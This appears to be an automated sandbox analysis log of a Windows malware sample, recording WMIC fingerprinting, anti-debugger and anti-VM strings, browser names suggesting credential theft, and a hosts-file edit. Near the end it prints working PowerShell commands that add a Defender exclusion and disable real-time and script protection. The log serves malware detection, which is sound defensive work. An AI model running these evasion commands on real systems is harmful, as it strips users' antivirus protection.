Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: opengl32.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: glu32.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dinput8.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: xinput1_4.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: inputhost.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: hid.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: DmI602ZFyp.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: DmI602ZFyp.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: DmI602ZFyp.exe Static file information: File size 26788352 > 1048576
Source: DmI602ZFyp.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x919600
Source: DmI602ZFyp.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x791000
Source: DmI602ZFyp.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x878600
Source: DmI602ZFyp.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: DmI602ZFyp.exe Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33DCD2A5 pushad ; iretd 8_2_00007FFD33DCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33EE7BD6 push esp; ret 8_2_00007FFD33EE7BD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33EE19DB pushad ; ret 8_2_00007FFD33EE19E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD33FB71C9 push ebx; retf 8_2_00007FFD33FB71CA

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: attrib.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7075
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2696
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1688
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep count: 7982 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep count: 1688 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File Volume queried: \Device\CdRom0\ FullSizeInformation
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltext/plainuser32.dllFyne ErrorFYNE_SCALERightShiftRightSuperdwmapi.dllexecerrdotSYSTEMROOT for type cancel.svgdelete.svgsearch.svgfolder.svgupload.svglogout.svgmenuExpandcontentCutmediaMusicmediaPhotomediaVideomediaPausefolderOpenviewZoomInvisibilityvolumeDownvolumeMuteboldItalicBoldItalicFYNE_CACHEvmwaretrayxenservicevmwareusermegadumperscyllahidemcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootShowWindowsystemdataLockFileExWSASocketWChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtrahttp2debugcrypto/tlsimage: NewConnectionimage/webpimage/jpegUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityconnectionHost: %s
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocsGODEBUG m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal file://LeftAltPATHEXTnumber confirmcheckedwarningarrowUphistorydesktopstorageaccountpressedsuccessregularRegularControlregeditollydbgdf5servvmusrvcqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe proavg.comCaption%.2f GBFloats:AvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaavx512fos/execruntimeNRGBA64UpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTcharsetnil keyfeatherIntegerFreeSidSleepExHeadingRawHTML%s%s {
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: BecauseCayleysCconintCedillaDiamondDownTeeElementImpliesLeftTeeNewLineNoBreakNotLessOverBarProductUpArrowUparrowangrtvbangzarrasympeqbacksimbecausebemptyvbetweenbigcircbigodotbigstarbnequivboxplusccupssmcemptyvcirscircoloneqcongdotcudarrlcudarrrcularrpcurarrmdbkarowddaggerddotseqdemptyvdiamonddigammadotplusdwangleeqcolonequivDDgesdotogtquestgtrlessharrcirintprodisindotlarrbfslarrsimlbrksldlbrksluldrdharlesdotolessdotlessgtrlesssimlotimesltquestluruharmalteseminusdunapproxnaturalnearrownexistsnotinvanotinvbnotinvcnotnivanotnivbnotnivcnpolintnpreceqnsqsubensqsupensubsetnsucceqnsupsetnvinfinnvltrienvrtrienwarrowolcrossorderoforslopepertenkplanckhpluscirplussimplustwoprecsimquatintquesteqrarrbfsrarrsimrbrksldrbrkslurdldharrealinerotimesruluharsearrowsimplussimrarrsubedotsubmultsubplussubrarrsuccsimsupdsubsupedotsuphsolsuphsubsuplarrsupmultsupplusswarrowtopforktriplustritimeuparrowuwanglevzigzagzigrarrfonnapado-hansdo-hantjy-hansjy-hantmn-hansmn-hantnp-hansnp-hantpx-hanspx-hantsp-hanssp-hantzh-hanszh-hantzo-hanszo-hantpolytonan-hansan-hantarevmdaak-hansak-hantsn-hanssn-hantprovencuu-hansuu-hantue-hanspdh.dll_pragmapragma _txlockSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:answers#intern{{end}} actioncommandoperandabl1943akuapemalalc97arevelaarkaikabalankabauddhabohoricemodenggrclassgrmistrhepburnitihasalaukikalemosinltg1929ltg2007metelkomonotonpahawh2pahawh3pahawh4sursilvsutsilvvaidika%s-%s%sAEsmallOEsmall001.000001.001001.002001.003crimsondarkreddimgraydimgreyfuchsiahotpinkmagentaoldlaceskybluethistleInstAltInstNopalt -> nop -> any -> EllipseEndPageFillRgnIsChildSetMenuSetRect_accessctime64wcsncpywcsrchrnil 
TLS2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavegb18030logicalcskoi8rkoi8-rudos-874tis-620chinesegb_2312cn-big5cseuckrksc5601unicode]?)(.*)GB18030GoString01234567beEfFgGvThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOrundll32icon.pnggo-builddisabledtruncateFullPath48828125infinitystrconv.parsing ParseIntFuncTypestruct {nil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdown Cause:KP_EnterRightAltCapsLockmenu.svginfo.svgfile.svghelp.svghome.svglist.svggrid.svgdocumentquestionmailSendfileTextsettingsvolumeUpdownloadcomputer%-13s %qvmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversaleset.com-CommandDisabled0.0.0.0 USERNAMEfinishedwsaioctlacceptexArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiavx512bwavx512vlgo/typesnet/httpgo/
Source: DmI602ZFyp.exe, 00000000.00000002.2599795670.00000185569E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: DmI602ZFyp.exe, 00000000.00000002.2605052081.00007FF7F552C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: m=nil base hangupkilledlistensocketEscapeReturnInsertDeleteexec: numberdeletesearchfolderuploadlogoutbuttonorangeyellowpurpleerror_Italic%w: %sImage x32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidra-ForceattribGetACPCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidirdtscppopcntcmd/gonetdnsRGBA64Gray16activeclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectPragmasocks Locked%s: %s, val normalradiussimple\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\u000b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f\u007ftoml: \"""""KeyEndGetAcesendtoMarkerOffsetfile[]NumbersqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexVideos
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\DmI602ZFyp.exe
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\DmI602ZFyp.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DmI602ZFyp.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
